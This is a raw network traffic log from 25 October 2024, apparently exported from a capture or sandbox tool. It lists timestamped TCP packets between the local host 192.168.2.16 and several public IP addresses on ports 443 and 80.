                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:34.585762024 CEST44349769188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:34.586050987 CEST49770443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:34.586062908 CEST44349770188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:34.586513996 CEST49771443192.168.2.16104.17.24.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:34.586530924 CEST44349771104.17.24.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:34.586591959 CEST49771443192.168.2.16104.17.24.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:34.586815119 CEST49772443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:34.586904049 CEST44349772151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:34.586975098 CEST49772443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:34.587054968 CEST49771443192.168.2.16104.17.24.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:34.587073088 CEST44349771104.17.24.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:34.587268114 CEST49772443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:34.587305069 CEST44349772151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:34.588814974 CEST49773443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:34.588906050 CEST44349773104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:34.588990927 CEST49773443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:34.589484930 CEST49773443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:34.589518070 CEST44349773104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.191790104 CEST44349769188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.192106962 CEST49769443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.192120075 CEST44349769188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.193556070 CEST44349769188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.193624020 CEST49769443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.194022894 CEST49769443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.194048882 CEST49769443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.194102049 CEST49769443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.194133997 CEST44349769188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.194215059 CEST49769443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.194478989 CEST49774443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.194546938 CEST44349774188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.194622993 CEST49774443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.194834948 CEST49774443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.194869995 CEST44349774188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.199901104 CEST44349771104.17.24.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.200180054 CEST49771443192.168.2.16104.17.24.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.200191021 CEST44349771104.17.24.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.200782061 CEST44349771104.17.24.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.201208115 CEST49771443192.168.2.16104.17.24.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.201292992 CEST44349771104.17.24.14192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.212795973 CEST44349772151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.213004112 CEST44349773104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.213187933 CEST49772443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.213248968 CEST44349772151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.213413954 CEST49773443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.213449955 CEST44349773104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.213927031 CEST44349772151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.214293003 CEST49772443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.214416027 CEST44349772151.101.194.137192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.214509010 CEST44349773104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.214818001 CEST49773443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.214984894 CEST44349773104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.230465889 CEST44349770188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.230789900 CEST49770443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.230808020 CEST44349770188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.232482910 CEST44349770188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.232564926 CEST49770443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.232952118 CEST49770443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.232971907 CEST49770443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.233021021 CEST49770443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.233067989 CEST44349770188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.233128071 CEST49770443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.233463049 CEST49775443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.233494997 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.233560085 CEST49775443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.233855009 CEST49775443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.233867884 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.249063969 CEST49771443192.168.2.16104.17.24.14
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.265054941 CEST49773443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.265206099 CEST49772443192.168.2.16151.101.194.137
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.852243900 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.852914095 CEST49775443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.852932930 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.854367971 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.854446888 CEST49775443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.854953051 CEST49775443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.855102062 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.855499983 CEST49775443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.855515957 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.877693892 CEST44349774188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.878129005 CEST49774443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.878160000 CEST44349774188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.881761074 CEST44349774188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.881894112 CEST49774443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.882317066 CEST49774443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.882468939 CEST44349774188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.899226904 CEST49775443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.931109905 CEST49774443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.931134939 CEST44349774188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:35.978106022 CEST49774443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:37.950870037 CEST44349760142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:37.950965881 CEST44349760142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:37.951332092 CEST49760443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:38.105885029 CEST44349761142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:38.105958939 CEST44349761142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:38.106046915 CEST49761443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:38.238245010 CEST44349762142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:38.238311052 CEST44349762142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:38.238533020 CEST49762443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:38.428535938 CEST44349763142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:38.428612947 CEST44349763142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:38.428680897 CEST49763443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:38.563503981 CEST44349764142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:38.563594103 CEST44349764142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:38.563666105 CEST49764443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:39.553746939 CEST49761443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:39.553781033 CEST44349761142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:39.553806067 CEST49763443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:39.553812981 CEST44349763142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:39.553839922 CEST49760443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:39.553841114 CEST49762443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:39.553877115 CEST44349760142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:39.553894043 CEST44349762142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:39.553939104 CEST49764443192.168.2.16142.250.184.196
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:39.553962946 CEST44349764142.250.184.196192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:39.667828083 CEST8049768213.5.71.85192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:39.667948961 CEST4976880192.168.2.16213.5.71.85
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:39.848567963 CEST4976880192.168.2.16213.5.71.85
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:39.853951931 CEST8049768213.5.71.85192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.733124018 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.733237028 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.733278990 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.733298063 CEST49775443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.733314037 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.733402014 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.733463049 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.733474970 CEST49775443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.733484983 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.733526945 CEST49775443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.733570099 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.733616114 CEST49775443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.733622074 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.787123919 CEST49775443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.851793051 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.852005005 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.852106094 CEST49775443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.852135897 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.852256060 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.852310896 CEST49775443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.852324009 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.852490902 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.852546930 CEST49775443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.852557898 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.852791071 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.852850914 CEST49775443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.853148937 CEST49775443192.168.2.16188.114.96.3
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.853176117 CEST44349775188.114.96.3192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.901118040 CEST49777443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.901165009 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.901242018 CEST49777443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.901482105 CEST49777443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:40.901496887 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.509839058 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.510198116 CEST49777443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.510231018 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.510682106 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.511080027 CEST49777443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.511158943 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.511257887 CEST49777443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.551331043 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.666659117 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.667016029 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.667090893 CEST49777443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.667109966 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.667231083 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.667285919 CEST49777443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.667293072 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.667455912 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.667507887 CEST49777443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.667514086 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.667648077 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.667699099 CEST49777443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.667704105 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.709121943 CEST49777443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.783420086 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.783601999 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.783706903 CEST49777443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.783714056 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.783746958 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.783798933 CEST49777443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.783848047 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.784008980 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.784073114 CEST49777443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.784085989 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.784496069 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.784554958 CEST49777443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.784560919 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.784657955 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.784706116 CEST49777443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.784713030 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.784883976 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.784943104 CEST49777443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.785058022 CEST49777443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.785069942 CEST44349777104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.788885117 CEST49778443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.788925886 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.789189100 CEST49778443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.789354086 CEST49778443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:41.789369106 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.440444946 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.441059113 CEST49778443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.441068888 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.441847086 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.442399025 CEST49778443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.442481995 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.442490101 CEST49778443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.483351946 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.492239952 CEST49778443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.616281033 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.616434097 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.616506100 CEST49778443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.616517067 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.616624117 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.616693974 CEST49778443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.616703987 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.616810083 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.616866112 CEST49778443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.616873026 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.616971016 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.617031097 CEST49778443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.617038965 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.621598005 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.622195005 CEST49778443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.622205973 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.668066025 CEST49778443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.740498066 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.740667105 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.740931988 CEST49778443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.740942955 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.795090914 CEST49778443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.864320993 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.864507914 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.864598989 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.864628077 CEST49778443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.864645004 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.864686012 CEST49778443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.864723921 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.864887953 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.864968061 CEST49778443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.864976883 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.865062952 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.865144968 CEST49778443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.865150928 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.865180969 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.865222931 CEST49778443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.865653038 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.865818977 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.865871906 CEST49778443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.865880013 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.865973949 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.866060019 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.866065025 CEST49778443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.866082907 CEST44349778104.18.95.41192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.866156101 CEST49778443192.168.2.16104.18.95.41
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:06:42.866559029 CEST44349778104.18.95.41192.168.2.16
